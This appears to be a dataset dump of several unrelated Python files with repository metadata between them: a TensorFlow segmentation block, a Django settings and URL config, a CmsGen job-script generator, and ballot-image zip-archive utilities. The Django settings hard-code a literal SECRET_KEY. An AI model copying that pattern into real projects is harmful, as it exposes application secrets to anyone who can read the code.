out = self.sum_con_3x3(detail_semantic_sum)
return out
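# A minimal usage sketch of the blocks above (added for illustration; the shapes,
# filter count and class count are assumptions, not the original training setup).
# The aggregation block expects a [detail, semantic] pair where the detail feature
# map is 4x the spatial size of the semantic one, matching its UpSampling2D(4, 4).
if __name__ == '__main__':
    import tensorflow as tf
    ge_down = Gather_Expansion_Down_Block(filters=128)          # halves spatial size
    ge = Gather_Expansion_Block(filters=128)                    # keeps spatial size
    bga = Bilateral_Guided_Aggregation_Block(filters=128, num_class=151)
    detail = tf.random.normal((1, 64, 64, 128))                 # detail-branch features
    semantic = ge(ge_down(tf.random.normal((1, 32, 32, 128))))  # 32x32 -> 16x16
    print(bga([detail, semantic]).shape)                        # (1, 64, 64, 151)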
|
[
"35882457+XinZhaoFu@users.noreply.github.com"
] |
35882457+XinZhaoFu@users.noreply.github.com
|
28a1a0ac8d51073c624faefdadd5efaaa05b9f90
|
342b914e888861c41a3681d6fe90aef04ef781cb
|
/settings.py
|
70825f990482a93f5504337ee500d7863f8dba8e
|
[] |
no_license
|
varunit/cseismic2kx
|
920b64859c95ab60be5961683429550570ef7b63
|
4e7a97ef71612c343046faf58094e685ceacec41
|
refs/heads/master
| 2020-12-25T12:08:30.142306
| 2010-08-05T14:27:04
| 2010-08-05T14:27:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,909
|
py
|
# Django settings for cseismic2kx project.
import os
ROOT_DIR = os.path.dirname(__file__)
try:
import localsettings
except ImportError:
print "Define Localsettings"
raise ImportError
DEBUG = localsettings.DEBUG
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = localsettings.DATABASES
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Asia/Kolkata'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-in'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(ROOT_DIR, 'static')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/static/admin-media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '*uhik@ffpc96vlg*k%*@==o_w+lc+4eijhpu^t+x%fdp!d*vxi'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django_authopenid.context_processors.authopenid',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.doc.XViewMiddleware',
'django_authopenid.middleware.OpenIDMiddleware',
'django.middleware.transaction.TransactionMiddleware',
)
ROOT_URLCONF = 'cseismic2kx.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(ROOT_DIR, 'templates'),
)
ACCOUNT_ACTIVATION_DAYS = 10
LOGIN_URL = '/account/signin'
LOGOUT_URL = '/account/signout'
LOGIN_REDIRECT_URL = '/'
REGISTRATION_OPEN = True
AUTH_PROFILE_MODULE = 'participantsprofile.profile'
DEFAULT_FROM_EMAIL = 'no-reply@cseismic2k10.co.cc'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'south',
'django_authopenid',
'cseismic2kx.home',
'cseismic2kx.events',
'cseismic2kx.host',
'cseismic2kx.registration',
'cseismic2kx.participantsprofile',
)
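# A minimal localsettings.py sketch (placeholder values, added for illustration only)
# showing the two attributes this settings module reads from it:
#
#   DEBUG = True
#   DATABASES = {
#       'default': {
#           'ENGINE': 'django.db.backends.sqlite3',
#           'NAME': 'cseismic2kx.db',
#       }
#   }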
|
[
"jkk.2k9@gmail.com"
] |
jkk.2k9@gmail.com
|
fe7e2469a76a7e7541dcb964b1b39b4f9ba6474f
|
dcd83aeb799143b58956612fb0bfc0258d30f229
|
/src/python/JobCreator/CmsGenTools.py
|
cee0312e494dc987fc6db4ede97f9c48a2de7566
|
[] |
no_license
|
giffels/PRODAGENT
|
67e3e841cfca7421caa505d03417b663a62d321b
|
c99608e3e349397fdd1b0b5c011bf4f33a1c3aad
|
refs/heads/master
| 2021-01-01T05:51:52.200716
| 2012-10-24T13:22:34
| 2012-10-24T13:22:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,571
|
py
|
#!/usr/bin/env python
"""
_CmsGenTools_
Tools for installing/manipulating a CmsGen type workflow node within
a workflow
"""
import inspect
import os
from JobCreator.AppTools import _StandardPreamble, _StandardAbortCheck
from JobCreator.AppTools import _StandardExitCodeCheck
import JobCreator.RuntimeTools.RuntimeCmsGen as RuntimeCmsGen
from ShREEK.ControlPoints.CondImpl.CheckExitCode import CheckExitCode
from ShREEK.ControlPoints.ActionImpl.BasicActions import KillJob
# //
# // Hardcoded at present, until we distribute the tool properly...
#//
CmsGenScriptUrl = "http://cern.ch/ceballos/alpgen/bin/cmsGen.py"
import ProdCommon.CmsGen
class InsertCmsGenStructure:
"""
_InsertCmsGenStructure_
TaskObject operator.
Act on a CmsGen type TaskObject and install some standard structure
for the TaskObject so that commands can be added to it
These fields get commands added to them by the creator plugin
allowing it to be customised if necessary.
Then the contents of the object gets built into an actual script
by the PopulateCmsGenScript operator below
"""
def __init__(self, nodeType = "PayloadNode"):
self.nodeType = nodeType
def __call__(self, taskObject):
"""
_operator()_
Act on a TaskObject, install a standard structure for generating
the main Executable script that calls cmsGen
"""
spec = taskObject[self.nodeType]
if spec.type != "CmsGen":
return
appDetails = spec.application
taskObject['CMSProjectName'] = spec.application['Project']
taskObject['CMSProjectVersion'] = spec.application['Version']
taskObject['CMSExecutable'] = spec.application['Executable']
taskObject['CmsGenConfiguration'] = spec.configuration
# //
# // Add an empty structured file to contain the PSet after
#// it is converted from the Python format.
taskObject.addStructuredFile("CmsGen.cfg")
# //
# // Add structures to enable manipulation of task main script
#// These fields are used to add commands and script calls
# //at intervals in the main script.
# //
#//
taskObject['PreTaskCommands'] = []
taskObject['PostTaskCommands'] = []
taskObject['PreAppCommands'] = []
taskObject['PostAppCommands'] = []
# //
# // Insert End Control Point check on exit status
#//
controlP = taskObject['ShREEKTask'].endControlPoint
exitCheck = CheckExitCode()
exitCheck.attrs['OnFail'] = "killJob"
exitAction = KillJob("killJob")
controlP.addConditional(exitCheck)
controlP.addAction(exitAction)
return
class PopulateCmsGenScript:
"""
_PopulateCmsGenScript_
Act on the TaskObject to convert fields into commands and insert them
into the main script structured file instance.
"""
def __init__(self, nodeType = "PayloadNode"):
self.nodeType = nodeType
def __call__(self, taskObject):
"""
_operator()_
For a TaskObject that has the appropriate App Keys generate
a standard task running script
"""
spec = taskObject[self.nodeType]
if spec.type != "CmsGen":
return
exeScript = taskObject[taskObject['Executable']]
# //
# // Install standard error handling command
#//
exeScript.append(_StandardPreamble)
envScript = taskObject[taskObject["BashEnvironment"]]
envCommand = "%s %s" % (envScript.interpreter, envScript.name)
exeScript.append(envCommand)
srcfile = inspect.getsourcefile(RuntimeCmsGen)
taskObject.attachFile(srcfile)
taskObject['PreTaskCommands'].append("chmod +x ./RuntimeCmsGen.py")
taskObject['PreTaskCommands'].append(
"./RuntimeCmsGen.py"
)
for item in taskObject['PreTaskCommands']:
exeScript.append(item)
# //
# // Pull in the cmsGen tool from the web and
#// make sure it is executable
#exeScript.append("wget %s -O cmsGen" % CmsGenScriptUrl)
# //
# // Install script from ProdCommon.CmsGen
#//
cmsGenScript = inspect.getsourcefile(ProdCommon.CmsGen)
cmsGenScript = cmsGenScript.replace("__init__.py", "cmsGen.py")
taskObject.attachFile(cmsGenScript)
exeScript.append("ln -s ./cmsGen.py cmsGen")
exeScript.append("chmod +x cmsGen")
exeScript.append("( # Start App Subshell")
for item in taskObject['PreAppCommands']:
exeScript.append(item)
# //
# // Need to set command line args at runtime
#// and pass them to the cmsGen command
# //The RuntimeCmsGen.py script will generate a file
# // called cmsGen.args which we cat to extract the content
#//
checkArgs = "if [ -e %s ];then\n" % "cmsGen.args"
checkArgs += " echo \"cmsGen.args is present\"\n"
checkArgs += "else\n"
checkArgs += " echo \"ERROR: cmsGen.args not present\"\n"
checkArgs += " prodAgentFailure 50113\n"
checkArgs += "fi\n"
exeScript.append(checkArgs)
exeScript.append(_StandardAbortCheck)
# //
# // Build Executable command
#//
exeComm = "./%s `cat cmsGen.args` &" % taskObject['CMSExecutable']
exeScript.append(exeComm)
exeScript.append("PROCID=$!")
exeScript.append("echo $PROCID > process_id")
exeScript.append("wait $PROCID")
exeScript.append("EXIT_STATUS=$?")
exeScript.append(_StandardExitCodeCheck)
exeScript.append(
"if [ ! -e exit.status ]; then echo \"$EXIT_STATUS\" > exit.status; fi")
exeScript.append("echo \"App exit status: $EXIT_STATUS\"")
for item in taskObject['PostAppCommands']:
exeScript.append(item)
exeScript.append("exit $EXIT_STATUS")
exeScript.append(") # End of App Subshell")
exeScript.append("EXIT_STATUS=$?")
exeScript.append("echo `date +%s` >| end.time")
for item in taskObject['PostTaskCommands']:
exeScript.append(item)
exeScript.append("echo \"Ended: `date +%s`\"")
exeScript.append("exit $EXIT_STATUS")
return
|
[
""
] | |
efa767f99a362671c9208cd80736bbe672911274
|
ee4df8a9928b684e054b45c0a7c464c38f9a4921
|
/django-rest-react-prototype/django_react/urls.py
|
f23278917e411c5badd2be3510e9d9a047795eb2
|
[] |
no_license
|
cs161sjsu/goldchest
|
7159a704d6bac267cc22e327504dda0a29b48827
|
5c57c373094098191c74a276eeecff4e8e8b706e
|
refs/heads/main
| 2023-03-23T19:19:24.176773
| 2021-03-23T22:48:08
| 2021-03-23T22:48:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 855
|
py
|
"""django_react URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('leads.urls')),
path('', include('frontend.urls')),
path(r'openid/', include('django_openid_auth.urls')),
]
|
[
"jakesrosen@gmail.com"
] |
jakesrosen@gmail.com
|
e85bfbbcd0952f79b26348c90c74ceae73761025
|
4f8a1eaaf546b05323f62200c8f1d1026bbb4dec
|
/utilities/zip_utils.py
|
68189d429e05cbed6952d6aef702bccdba87de56
|
[] |
no_license
|
iero1997/audit-engine-s3-and-lambdas-dev
|
1dc33c19e954952fd394d866facb7b32840e112f
|
c3d2d1669a6509a3581a89c8a047e28801b0b1f7
|
refs/heads/master
| 2022-12-13T09:19:29.487704
| 2020-09-08T14:01:17
| 2020-09-08T14:01:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 28,802
|
py
|
#import io
import os
import re
import sys
import time
import logging
import zipfile
import traceback
from zipfile import ZipFile
from aws_lambda import s3utils
#import time
from utilities import utils, logs
# does anyone know why this TRY is here??
try:
from utilities.config_d import config_dict
from utilities.images_utils import get_images_from_pbm, get_images_from_pdf, get_images_from_png, get_images_from_tif
from models.DB import DB
except ImportError:
get_images_from_pbm = get_images_from_pdf = get_images_from_png = get_images_from_tif = None
PRECINCT_REG = re.compile(r'/(.*?)\.zip$')
BALLOT_FORMAT = {
'.pdf': {
'name_reg': r"(\d+i)\.pdf$",
'get_images': get_images_from_pdf,
},
'.pbm': {
'name_reg': r"(\w+)[FR]\.pbm$",
'get_images': get_images_from_pbm,
},
'.png': {
'name_reg': r"(\w+)\.png$",
'get_images': get_images_from_png,
},
'.tif': {
'name_reg': r"(\w+)\.tif$",
'get_images': get_images_from_tif,
},
'.json': {
'name_reg': r"(\w+)\.json$",
'get_images': None,
},
}
def analyze_ballot_filepath(file_path: str) -> tuple: # returns name, extension, ballotid
""" given file path, return filename, extension, ballotid = analyze_ballot_filepath(file_path)
Note: extension includes '.'
"""
#_, filename = os.path.split(file_path)
filename = utils.safe_path_split(file_path)[1] # archives opened in linux env use both '/' and '\\' separators.
name, extension = os.path.splitext(filename)
# leave only digits and underscores in the ballotid
ballotid = re.sub(r'[^\d_]', '', name)
# sometimes there is an additional extension at th end of the file name.
# this may indicate the sheet number, but the rest of the ballot_id is still unique
ballotid = re.sub(r'^(\d{5}_\d{5}_\d{5,})_\d$', r'\1', ballotid)
return name, extension, ballotid
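# Illustrative call (made-up file name): the helper strips the extension, keeps only
# digits/underscores for the ballot id, and collapses a trailing sheet-number suffix.
# analyze_ballot_filepath('precinct_12/00123_00456_00789_1.pdf')
#   -> ('00123_00456_00789_1', '.pdf', '00123_00456_00789')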
def get_ballotid(file_path):
return analyze_ballot_filepath(file_path)[2]
def get_ballotid_of_marks_df(file_path):
match = re.search(r'^marks_df_(\d+)\.json$', file_path)
return match[1]
def get_attribute_from_path(argsdict, ballot_image_path, attribute_name):
""" given ballot_image_path from zip archive, extract attribute from path
based on setting of level from argsdict for the attribute.
attribute of -1 means not available.
attribute_names are: 'precinct-folder', 'party-folder', 'group-folder'
returns '' if attribute of -1 is specified.
"""
attribute_str = ''
path_segments = re.split(r'[/\\]', ballot_image_path)
path_segments.pop()
folder_level = int(argsdict.get(attribute_name, 0)) # -1 means the path does not provide this info.
if folder_level >= 0:
if not (folder_level < len(path_segments)):
utils.sts(
f"get_attribute_from_path: {attribute_name} input spec {folder_level} is out of range. Must be less than {len(path_segments)}\n"
f"ballot_image_path provided is {ballot_image_path}")
import pdb; pdb.set_trace()
sys.exit(1)
attribute_str = path_segments[folder_level]
#elif attribute_name == 'precinct-folder':
# utils.exception_report(f"{attribute_name} specified as -1, this attribute cannot be determined from ballot file path. "
# f"Apparently all image files are provided in one big heap. Consider using 'precinct_pattern' input parameter.")
# attribute_str = 'Unspecified Precinct'
return attribute_str
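# Worked example for the folder-level lookup above (hypothetical path and settings):
# with ballot_image_path = 'CGr_Vote by Mail/Precinct 0101/00123i.pdf' and
# argsdict = {'group-folder': 0, 'precinct-folder': 1}, the path is split on '/' or
# '\\', the basename is dropped, and level 0 returns 'CGr_Vote by Mail' while
# level 1 returns 'Precinct 0101'.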
def get_precinct(argsdict, ballot_image_path):
"""
Gets ballot 'precinct' and 'type' (party) based on ballot ballot image file path.
If precinct_pattern is specified, it is used as regex to extract a portion of the filename.
otherwise,
If 'precinct-folder' is specified in the input file and it is not -1, it will be used, if possible.
NOTE: These input parameters precinct-folder and party-folder are temporary. Instead, it will likely
be possible to gather these parameters from the path for a given vendor without needing those
parameters because the 'party' level is either there or not, and can only be a few different
strings. Other vendors have other schemes.
ES&S .pbm files from ES&S have the precinct encoded differently. Can use 'precinct_pattern' in these cases.
use precinct_folder_pattern to extract active portion of the folder level specified.
"""
precinct_str = ''
precinct_pattern = argsdict.get('precinct_pattern')
if precinct_pattern:
filename, _, _ = analyze_ballot_filepath(ballot_image_path)
precinct_str = utils.apply_regex(filename, precinct_pattern, default='')
return precinct_str
precinct_folder_pattern = argsdict.get('precinct_folder_pattern', '')
if precinct_folder_pattern:
precinct_folder_str = get_attribute_from_path(argsdict, ballot_image_path, 'precinct-folder')
precinct_str = utils.apply_regex(precinct_folder_str, precinct_folder_pattern)
return precinct_str
def get_party(argsdict, ballot_image_path):
"""
Gets ballot 'party' based on ballot ballot image file path.
If 'party-folder' is specified in the input file and it is not -1, it will be used, if possible.
otherwise, the path compenents of 1 is used.
string from the path are returned.
TODO: These input parameters precinct-folder and party-folder are temporary. Instead, it will likely
be possible to gather these parameters from the path for a given vendor without needing those
parameters because the 'party' level is either there or not, and can only be a few different
strings. Other vendors have other schemes.
TODO: ES&S .pbm files from ES&S have the precinct encoded differently.
"""
return get_attribute_from_path(argsdict, ballot_image_path, 'party-folder')
def get_group(argsdict, ballot_image_path):
""" The group attribute typically separates VBM and inperson voting.
SF uses the strings 'CGr_Election Day' and 'CGr_Vote by Mail'
"""
return get_attribute_from_path(argsdict, ballot_image_path, 'group-folder')
def open_zip_archive(source, testzip=False):
""" Gets ZIP archive from source file path
Checks for error conditions and raises errors.
"""
if not os.path.exists(source):
raise FileNotFoundError('Source file not found')
# check if passed argument is ZIP file
if not zipfile.is_zipfile(source):
raise ValueError('Source file is not in ZIP format')
# load source archive
archive_obj = ZipFile(source, 'r')
# check if some files are corrupted
if testzip:
corrupted_file = ZipFile.testzip(archive_obj)
if corrupted_file:
print(f"Corrupted files: {corrupted_file}")
return archive_obj
def set_archive_path_local_vs_s3(argsdict, archive_basename):
""" function derives proper full path to archive either on s3 or local
"""
archive_basename = os.path.basename(archive_basename)
folder_path = argsdict['archives_folder_s3path'] if argsdict['use_s3_archives'] else argsdict['archives_folder_path']
fullpath = os.path.join(folder_path, archive_basename)
return fullpath
WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT = {}
def was_archive_generated_on_windows(archive_obj):
try:
archive_basename = os.path.basename(archive_obj.fp.name)
except:
# can't find basename for some reason -- we can't use lookup optimization
return bool(re.search(r'\\', get_file_paths(archive_obj)[0]))
if WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT.get(archive_basename, None) is None:
# we have not evaluated this archive to detemine whether it was generated on windows.
        WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT[archive_basename] = bool(re.search(r'\\', get_file_paths(archive_obj)[0]))
return WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT[archive_basename]
def open_archive(argsdict, archive_basename, silent_error=False):
""" This is a general entry point for both local archives and s3 based archives.
The source_path can be full path to local or s3 resources, or just basename.
1. check argsdict['use_s3_archives']
2. reduce source_path to just basename
3. prepend either argsdict['archives_folder_path'] or argsdict['archives_folder_s3path']
"""
fullpath = set_archive_path_local_vs_s3(argsdict, archive_basename)
utils.sts(f"Opening source archive: {fullpath}", 3)
if argsdict['use_s3_archives']:
archive_obj = s3_open_archive(s3path=fullpath, silent_error=silent_error)
else:
archive_obj = open_local_archive(source_path=fullpath, silent_error=silent_error)
return archive_obj
def open_local_archive(source_path, testzip=False, silent_error=False):
""" Deals with the error conditions raised in open_zip_archive
Q: why is it a good idea to keep these separate?
It seems that only one archive can be open at a time.
"""
# we've had trouble with spurious "file does not exist" detections when it does.
source_path = os.path.normcase(os.path.normpath(source_path)).strip()
if os.path.isfile(source_path):
utils.sts(f"Verified that {source_path} exists.")
else:
utils.sts(f"Archive {source_path} does not exist according to os.path.exists().")
# this may be a spurious problem related to using a file server.
tot_time = 0
for i in range(1,20):
utils.sts(f"Waiting {i} seconds", 3)
time.sleep(i)
tot_time += i
if os.path.isfile(source_path):
utils.sts(f"After wait of {tot_time} secs, {source_path} now exists according to os.path.exists().", 3)
#import pdb; pdb.set_trace()
break
else:
utils.sts(f"After wait of {tot_time} secs, {source_path} still not found according to os.path.exists().", 3)
import pdb; pdb.set_trace()
sys.exit(1)
try:
archive = open_zip_archive(source_path, testzip)
except (FileNotFoundError, ValueError) as error:
if not silent_error:
logging.error(f"Failed to open archive {source_path} Program failed due to %s", error)
sys.exit(1)
else:
return None
return archive
def s3_open_archive(s3path, silent_error=False):
""" open archive according to s3path
s3://<bucket>/US/WI/WI_Dane_2019_Spring_Pri/2019 Spring Primary Ballot Images.zip
"""
if not s3utils.does_s3path_exist(s3path):
if not silent_error:
utils.sts(f"s3path: {s3path} not found. Cannot open archive.", 3)
sys.exit(1)
return None
try:
s3_IO_obj = s3utils.get_s3path_IO_object(s3path)
archive_obj = ZipFile(s3_IO_obj, 'r')
except (FileNotFoundError, ValueError) as error:
if not silent_error:
logging.error(f"Failed to open archive {s3path} Program failed due to %s", error)
sys.exit(1)
else:
return None
return archive_obj
def get_file_paths(archive_obj) -> list:
"""Gets a list of paths that end with an extension of any kind.
It seems filtering at this stage is a waste of time.
"""
regex = r"\.\w+$"
file_paths = filter(
lambda file: file if re.search(regex, file) else False,
ZipFile.namelist(archive_obj))
return list(file_paths)
def adjust_filepath_separators(archive_obj, path):
""" final path separators must be altered if archive was generated on windows and being read on linux.
This occurs when the list of filepaths internal to the archive are listed on one platform and then
used on the other, when the archive was originally created on Windows.
"""
# this function deals with an inconsistency in zip archives
# with regard to the last filepath separator in file names
# in the archive.
# There are four cases, based on whether the archive is
# produced and then viewed on Windows vs. Linux system.
# Archive generated on:
# |------------------|------------------|
# | Windows | Linux |
# | Actual Shown | Actual Shown |
# Viewed on: |--------+---------|------------------|
# Windows | \ | / | / | / |
# |------------------|------------------|
# Linux | \ | \ | / | / |
# |------------------|------------------|
# strangely, when an archive is generated on windows,
# the last separator is actually \ but it is converted
# by the library so it is /. Thus, if an archive is only
# used on windows or only on linux, this is not a problem.
# However, a zip archive used in linux will regard the
# last separator not as a file separator, but as a
# legitimate filename character, and then join the
# basename with the prior path element as one file name.
# In every case, what is shown is what must be used to
# access a file. Therefore, we will look at the first
# file entry, and if there are any file separators,
# then take the last one, and make that the required
# separator.
# According to zip file specification:
# https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT
# 4.4.17.1 The name of the file, with optional relative path.
# The path stored MUST NOT contain a drive or
# device letter, or a leading slash. All slashes
# MUST be forward slashes '/' as opposed to
# backwards slashes '\' for compatibility with Amiga
# and UNIX file systems etc. If input came from standard
# input, there is no file name field.
if was_archive_generated_on_windows(archive_obj):
if os.sep == '/':
# Linux:
# when trying to access entries using constructed paths, the last element must be changed
# to match the true form of the files as stored in the zip archive.
path = '\\'.join(utils.safe_path_split(path))
else:
# Windows:
# When accessing an entry based on a list of files stored in the archive which was generated
# on linux, then the windows interface requires that the separator be changed to '/'
path = '/'.join(utils.safe_path_split(path))
return path
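# Illustrative correction (made-up entry name, and assuming utils.safe_path_split
# splits on both separators): reading a Windows-built archive on Linux, an entry
# listed as 'precinct_01/00123i.pdf' must be requested as 'precinct_01\00123i.pdf',
# because the stored name keeps the backslash as an ordinary filename character.
# adjust_filepath_separators(win_archive, 'precinct_01/00123i.pdf')
#   -> 'precinct_01\\00123i.pdf'    # when os.sep == '/'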
def get_image_file_paths_from_archive(archive_obj):
"""
Filters 'file_paths' to only containing certain name format
based on file extension.
NOTE: file paths from archives created on windows will use backslash
as the final path separator if read on linux. These are not
altered at this point.
"""
file_paths = get_file_paths(archive_obj)
filtered_paths = []
for file_path in file_paths:
try:
# note that the extension includes '.'
#file_ext = re.search(r'(\.\w+)$', file_path).group(1)
file_ext = os.path.splitext(file_path)[1]
if file_ext == '.db': continue # sometimes "Thumbs.db" are included.
# the following attempts to read the file.
filtered_path = re.search(
BALLOT_FORMAT[file_ext]['name_reg'], file_path)
except (AttributeError, KeyError) as error:
print(f"Couldn't parse the file path:{file_path} error:{error}")
continue
if filtered_path:
filtered_paths.append(file_path)
return filtered_paths
def get_archived_file(archive, file_name=None):
""" Returns dictionary of 'file_name' from archive
NOTE: This may alter the final path separator if running on linux
and archive was originally produced on windows.
"""
try:
result = {'name': file_name, 'bytes_array': archive.read(adjust_filepath_separators(archive, file_name))}
except (OSError, KeyError):
result = None
return result
def get_archived_file_size(archive, file_name) -> int:
""" return the size of the file without extracting it. """
zipinfo = archive.getinfo(adjust_filepath_separators(archive, file_name))
return zipinfo.file_size
def is_archived_file_BMD_type_ess(argsdict, archive, file_name) -> bool:
"""
:param source_name: Name of the source with file. Used for lambdas S3 lookup.
"""
if not argsdict.get('BMDs_exist', False):
return False
expressvote_ballot_threshold = int(argsdict.get('BMD_filesize_threshold', 0))
if not expressvote_ballot_threshold:
expressvote_ballot_threshold = int(config_dict['EXPRESSVOTE_BALLOT_FILESIZE_THRESHOLD'])
""" typically expressvote BMD ballots are smaller than conventional ballots,
about 16K while standard hand-marked paper ballots are larger, at least 34K.
We can check before we remove from the archive. Note, this varies depending on the
complexity of the ballot.
"""
return get_archived_file_size(archive, file_name) < expressvote_ballot_threshold
def get_next_ballot_paths(index, archive, file_paths, extension=None):
"""
given entire list of file_paths and index in archive,
Returns a list of one or two filepaths that relate to a single ballot
Most ballot types(.pdf, .png, .tif) have one file per both sides but
.pbm has two filenames per ballot.
"""
try:
file_path = file_paths[index]
except:
pass
# for most cases, there is only one file per ballot sheet. .pbm has two files per sheet.
return_paths = [file_path]
if extension is None:
_, extension = os.path.splitext(file_path) # note: extension includes '.'
if extension == '.pbm':
index += 1
try:
R_file_path = file_paths[index]
except:
utils.exception_report(f"Warning: could not find rear file of .pbm file {file_path}, insufficient files.")
return index-1, return_paths
if file_path.endswith('F.pbm') and R_file_path.endswith('R.pbm'):
_, _, ballotid = analyze_ballot_filepath(file_path)
_, _, R_ballotid = analyze_ballot_filepath(R_file_path)
if ballotid == R_ballotid:
return_paths.append(R_file_path)
else:
utils.exception_report(f"Warning: could not find rear file of .pbm file {file_path}")
return index-1, return_paths
return index, return_paths
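# Illustrative .pbm pairing (hypothetical file list): most formats map one file per
# ballot sheet, but .pbm ballots arrive as a front/rear pair sharing one ballot id.
# file_paths = ['b/00001_00002_00003F.pbm', 'b/00001_00002_00003R.pbm', ...]
# get_next_ballot_paths(0, archive, file_paths)
#   -> (1, ['b/00001_00002_00003F.pbm', 'b/00001_00002_00003R.pbm'])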
def get_ballot_images(index, archive, file_paths, extension=None):
"""
Returns a list of images from a file, using a method specified
file is indexed in file_paths
in BALLOT_METHOD dictionary under 'extension' key.
"""
file_path = file_paths[index]
if extension is None:
name, extension, ballotid = analyze_ballot_filepath(file_path) # note: extension includes '.'
ballot_file = get_archived_file(archive, file_path)
images = BALLOT_FORMAT[extension]['get_images'](ballot_file)
# Exception for .pbm two sided ballots divided to two files
if extension == '.pbm':
try:
index += 1
r_file_path = file_paths[index]
if file_path.endswith('F.pbm') and r_file_path.endswith('R.pbm'):
r_name, r_extension, r_ballotid = analyze_ballot_filepath(r_file_path)
r_ballot_file = get_archived_file(archive, r_file_path)
                # hand the rear page to the matching format handler and merge its images
                images.extend(BALLOT_FORMAT[r_extension]['get_images'](r_ballot_file))
except IndexError as error:
logging.error("Couldn't find the rear page due to: %s", error)
sys.exit(1)
return index, images
def filter_paths_by_skip(argsdict, file_paths):
"""
Returns a filtered list of file paths. The'skip' parameter can be a number
of elements to skip from the start of the list or a precinct against which
the list should be filtered. Any other precincts after the precinct in
'skip' will be returned also.
"""
    def is_int(text):
        try:
            int(text)
            return True
        except (TypeError, ValueError):
            return False
skip = argsdict.get('skip')
if skip is None or skip == 0 or skip == '0':
return file_paths
if is_int(skip):
skip = int(skip)
list_len = len(file_paths)
diff = skip - list_len
file_paths = file_paths[skip - config_dict['SKIPPED_NUM']:]
if config_dict['SKIPPED_NUM'] < skip:
config_dict['SKIPPED_NUM'] += list_len if diff >= 0 \
else skip - config_dict['SKIPPED_NUM']
if config_dict['SKIPPED_NUM'] > skip:
config_dict['SKIPPED_NUM'] = skip
else:
print("Skip argument is not an integer.\nFiltering file names list...")
i = 0
for file_path in file_paths:
if skip not in file_path:
i += 1
else:
break
file_paths = file_paths[i:]
print(f"Filtered {len(file_paths)} file(s) from the list.")
return file_paths
def filter_paths_by_precinct(argsdict, file_paths):
"""
Return filtered list of file paths.
'precincts' parameter should be a list of precincts to which
list should be filtered.
"""
precincts = argsdict.get('precinct')
if precincts is None or precincts == []:
return file_paths
if not isinstance(precincts, list):
precincts = [precincts]
utils.sts("Filtering file names list by specified precincts...", 3)
selected_file_paths = []
for file_path in file_paths:
precinct_of_file = get_precinct(argsdict, file_path)
if precinct_of_file in precincts:
selected_file_paths.append(file_path)
utils.sts(f"Selected {len(selected_file_paths)} file(s) from the list.", 3)
return selected_file_paths
def null_function(parameter):
return parameter
def filter_ballotids(argsdict, proposed_ballot_id_list, silent=False):
"""
Return filtered list of ballotids.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
"""
return filter_proposed_list_by_ballotid(argsdict, proposed_ballot_id_list, null_function, silent)
def filter_paths_by_ballotid(argsdict, file_paths, silent=False):
"""
Return filtered list of file paths.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
"""
return filter_proposed_list_by_ballotid(argsdict, file_paths, get_ballotid, silent)
def filter_mark_df_paths_by_ballotid(argsdict, file_paths, silent=False):
"""
Return filtered list of file paths.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
"""
return filter_proposed_list_by_ballotid(argsdict, file_paths, get_ballotid_of_marks_df, silent)
